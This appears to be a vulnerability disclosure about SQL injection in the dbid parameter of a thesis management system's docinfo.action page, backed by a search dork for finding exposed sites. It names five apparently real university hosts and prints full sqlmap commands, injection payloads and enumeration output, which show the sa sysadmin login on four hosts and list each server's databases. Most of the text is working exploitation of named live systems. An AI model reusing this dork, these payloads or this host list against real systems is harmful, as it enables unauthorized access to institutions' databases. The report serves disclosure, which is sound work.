### Summary:
The thesis management system (论文管理系统) has a generic SQL injection vulnerability.
### Details:
Injection points: the `dbid` and `docid` GET parameters of `docinfo.action` (the sqlmap runs below target `dbid` via `-p "dbid"`). The back end is Microsoft SQL Server and, on four of the five hosts tested, the application connects as the `sa` sysadmin login; together with the working stacked-query vector this means arbitrary T-SQL, not just data retrieval.
Search keyword (dork): inurl:/docinfo.action?dbid=
![1.png](https://images.seebug.org/upload/201501/14143342fcf43465308f6bc3497cfd0583701857.png)
http://202.195.136.150/docinfo.action?dbid=72&docid=40824
http://202.199.163.37/docinfo.action?dbid=72&docid=40619
http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793
http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927
http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517
1) http://202.195.136.150/docinfo.action?dbid=72&docid=40824

```
sqlmap.py -u "http://202.195.136.150/docinfo.action?dbid=72&docid=40824" -p "dbid" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 61 HTTP(s) requests:
---
Place: GET
Parameter: dbid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dbid=72 AND 9888=9888&docid=40824
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=40824
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=40824
---
[17:25:15] [INFO] testing MySQL
[17:25:32] [WARNING] the back-end DBMS is not MySQL
[17:25:32] [INFO] testing Oracle
[17:25:49] [WARNING] the back-end DBMS is not Oracle
[17:25:49] [INFO] testing PostgreSQL
[17:26:06] [WARNING] the back-end DBMS is not PostgreSQL
[17:26:06] [INFO] testing Microsoft SQL Server
[17:26:23] [INFO] confirming Microsoft SQL Server
[17:27:15] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[17:27:15] [INFO] fetching current user
[17:27:15] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[17:27:15] [INFO] retrieved:
[17:29:12] [INFO] retrieved:
[17:29:12] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queries
sa
current user: 'sa'
[17:36:12] [INFO] fetching current database
[17:36:12] [INFO] retrieved:
[17:38:10] [INFO] retrieved: etd4
current database: 'etd4'
[17:50:28] [INFO] fetching database names
[17:50:28] [INFO] fetching number of databases
[17:50:28] [INFO] retrieved:
[17:51:19] [INFO] retrieved: 7
[17:53:44] [INFO] retrieved:
[17:55:41] [INFO] retrieved: etd4
[18:07:59] [INFO] retrieved:
[18:09:57] [INFO] retrieved: etd4new
[18:30:04] [INFO] retrieved:
[18:32:01] [INFO] retrieved: idl
[18:41:45] [INFO] retrieved:
[18:43:44] [INFO] retrieved: master
[19:01:04] [INFO] retrieved:
[19:03:01] [INFO] retrieved: model
[19:18:02] [INFO] retrieved:
[19:20:01] [INFO] retrieved: msdb
[19:32:17] [INFO] retrieved:
[19:34:15] [INFO] retrieved: temp
[19:47:23] [ERROR] invalid character detected. retrying..
[19:47:23] [WARNING] increasing time delay to 6 seconds
db
available databases [7]:
[*] etd4
[*] etd4new
[*] idl
[*] master
[*] model
[*] msdb
[*] tempdb
```
2) http://202.199.163.37/docinfo.action?dbid=72&docid=40619 (this and the following runs resume a saved sqlmap session, hence "0 HTTP(s) requests" and the "resumed:" lines)

```
sqlmap.py -u "http://202.199.163.37/docinfo.action?dbid=72&docid=40619" -p "dbid" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: dbid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dbid=72 AND 4908=4908&docid=40619
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=40619
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=40619
---
[09:45:41] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[09:45:41] [INFO] fetching current user
[09:45:41] [INFO] resumed: sa
current user: 'sa'
[09:45:41] [INFO] fetching current database
[09:45:41] [INFO] resumed: etd
current database: 'etd'
[09:45:41] [INFO] fetching database names
[09:45:41] [INFO] fetching number of databases
[09:45:41] [INFO] resumed: 5
[09:45:41] [INFO] resumed: etd
[09:45:41] [INFO] resumed: master
[09:45:41] [INFO] resumed: model
[09:45:41] [INFO] resumed: msdb
[09:45:41] [INFO] resumed: tempdb
available databases [5]:
[*] etd
[*] master
[*] model
[*] msdb
[*] tempdb
```
3) http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793

```
sqlmap.py -u "http://paper.buaalib.com/docinfo.action?dbid=72&docid=5793" -p "dbid" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: dbid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dbid=72 AND 1458=1458&docid=5793
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=5793
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=5793
---
[13:58:21] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[13:58:21] [INFO] fetching current user
[13:58:21] [INFO] resumed: sa
current user: 'sa'
[13:58:21] [INFO] fetching current database
[13:58:21] [INFO] resumed: etd
current database: 'etd'
[13:58:21] [INFO] fetching database names
[13:58:21] [INFO] fetching number of databases
[13:58:21] [INFO] resumed: 10
[13:58:21] [INFO] resumed: etd
[13:58:21] [INFO] resumed: lunwen
[13:58:21] [INFO] resumed: master
[13:58:21] [INFO] resumed: model
[13:58:21] [INFO] resumed: msdb
[13:58:21] [INFO] resumed: ReportServer
[13:58:21] [INFO] resumed: ReportServerTempDB
[13:58:21] [INFO] resumed: tempdb
[13:58:21] [INFO] resumed: test
[13:58:21] [INFO] resumed: tsk
available databases [10]:
[*] etd
[*] lunwen
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test
[*] tsk
```
4) http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927

```
sqlmap.py -u "http://202.121.96.135:8086/docinfo.action?dbid=72&docid=13927" -p "dbid" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: dbid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dbid=72 AND 7461=7461&docid=13927
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=13927
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=13927
---
[11:41:58] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
[11:41:58] [INFO] fetching current user
[11:41:58] [INFO] resumed: etd
current user: 'etd'
[11:41:58] [INFO] fetching current database
[11:41:58] [INFO] resumed: etd4
current database: 'etd4'
[11:41:58] [INFO] fetching database names
[11:41:58] [INFO] fetching number of databases
[11:41:58] [INFO] resumed: 9
[11:41:58] [INFO] resumed: chek
[11:41:58] [INFO] resumed: etd4
[11:41:58] [INFO] resumed: idl30
[11:41:58] [INFO] resumed: master
[11:41:58] [INFO] resumed: model
[11:41:58] [INFO] resumed: msdb
[11:41:58] [INFO] resumed: ReportServer$LIB
[11:41:58] [INFO] resumed: ReportServer$LIBTempDB
[11:41:58] [INFO] resumed: tempdb
available databases [9]:
[*] chek
[*] etd4
[*] idl30
[*] master
[*] model
[*] msdb
[*] ReportServer$LIB
[*] ReportServer$LIBTempDB
[*] tempdb
```
5) http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517

```
sqlmap.py -u "http://219.244.185.22:8080/docinfo.action?dbid=72&docid=62517" -p "dbid" --dbs --current-user --current-db
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: dbid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dbid=72 AND 1334=1334&docid=62517
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: dbid=72; WAITFOR DELAY '0:0:5';--&docid=62517
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: dbid=72 WAITFOR DELAY '0:0:5'--&docid=62517
---
[13:59:22] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[13:59:22] [INFO] fetching current user
[13:59:22] [INFO] resumed: sa
current user: 'sa'
[13:59:22] [INFO] fetching current database
[13:59:22] [INFO] resumed: etd
current database: 'etd'
[13:59:22] [INFO] fetching database names
[13:59:22] [INFO] fetching number of databases
[13:59:22] [INFO] resumed: 7
[13:59:22] [INFO] resumed: etd
[13:59:22] [INFO] resumed: idl30
[13:59:22] [INFO] resumed: idl30oooo
[13:59:22] [INFO] resumed: master
[13:59:22] [INFO] resumed: model
[13:59:22] [INFO] resumed: msdb
[13:59:22] [INFO] resumed: tempdb
available databases [7]:
[*] etd
[*] idl30
[*] idl30oooo
[*] master
[*] model
[*] msdb
[*] tempdb
```
### Proof of Vulnerability:
Proven; see the sqlmap sessions above.